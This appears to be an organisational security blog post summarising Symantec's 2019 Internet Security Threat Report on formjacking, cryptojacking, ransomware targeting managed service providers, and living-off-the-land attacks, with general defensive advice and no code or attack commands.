Cybercriminals are driven by opportunity and go where the money is. As soon as the good guys figure out how to stop them, they’ve already figured out their next move. So, it’s no wonder that the cyber threat environment is constantly changing, and exploits continue to evolve and shift.
Situational Risk Awareness — being aware of the risks posed in any given situation — is one of the best ways to be prepared to defend your organization against these evolving threats. To provide us with insight on the latest cyberattack trends, Symantec analyzes data from their Global Intelligence Network and regularly publishes their findings in The Internet Security Threat Report. Let’s explore a few of the top cyber threats from their most recent report, published in February 2019.
The increase in formjacking attacks has been linked to Magecart, a group or groups of threat actors known for carrying out this type of attack. In 2018 Magecart was linked to many high-profile attacks, including Tickmaster and British Airways, and reportedly tens of millions of dollars were stolen. Their success was in large part due to infecting the source-code of third-party e-commerce software development services, which allowed them to inject their malicious code onto hundreds of targeted websites with a single attack. Because why only target one website when you can target a vendor and hit hundreds of sites in one shot?
Cryptojacking is the surreptitious “mining” or “minting” of virtual currencies using compromised hardware. It rose to fame in 2018 to overtake Ransomware as the cyberattack of choice. In 2018 Symantec, “blocked more than four times as many cryptojacking events as in 2017 — almost 69 million cryptojacking events in the 12-month period, compared to just over 16 million in 2017.”
Activity is in decline however, as cryptocurrency values have dropped significantly, especially in the last months of 2018. Just recently, Coinhive, a cryptomining service announced it will discontinue its services on March 8, 2019 because of declining returns. According to Brian Krebs, “[Coinhive] has been heavily abused to force hacked Web sites to mine virtual currency.”
Even though prevalence of cryptojacking appears to be tied to cryptocurrency values, the threat is worth keeping on our radar.
Ransomware takes over your computer, threatens harm, usually by denying access to your data, and demands a ransom. After reaching amazing heights in 2017, ransomware activity declined in 2018 for the first time since 2013. But even though overall ransomware infections were down, enterprise infections were up by 12 percent according to Symantec.
Following the trend of mass-infection though, ransomware attacks are beginning to target managed service providers (MSPs), so they can infect all of their clients at once. According to BleepingComputer, “Recent reports indicate that multiple MSPs have been hacked recently, which has led to hundreds, if not thousands, of clients being infected with the GandCrab Ransomware.”
If you’re using an MSP, be sure that your integration software is up-to-date and secure, and that they aren’t using a generic account to administer your environment. It’s your responsibility to ensure they have the same level of security controls as you have!
And for some good news: A free decryptor for GandCrab Ransomware was recently released and includes tools for versions 1, 4, 5, and 5.04 – 5.1. It can be found at the No More Ransom Project website, which is a collaboration between Europol, the Dutch National Police, Kaspersky Lab, and McAfee.
Living off the Land (LotL) Attacks
LotL tactics involve using trusted off-the-shelf and pre-installed system tools to carry out an attack. They allow attacks to hide their malicious activity in with legitimate processes. Fileless malware is an example of a LotL techniques, which operates by using legitimate programs, typically PowerShell, for malicious purposes.
According to the Symantec report, “PowerShell usage is now a staple of both cybercrime and targeted attacks — reflected by a massive 1,000 percent increase in malicious PowerShell scripts blocked in 2018 on the endpoint.”
The expanding use of LotL techniques poses a challenge for organizations because they are very difficult to identify and block. Advanced detection methods, like behavioral analysis and threat hunting, are often required to find these attacks arriving through trusted channels, using legitimate tools for malicious purposes.
To learn more download Symantec’s 2019 Internet Security Threat Report here.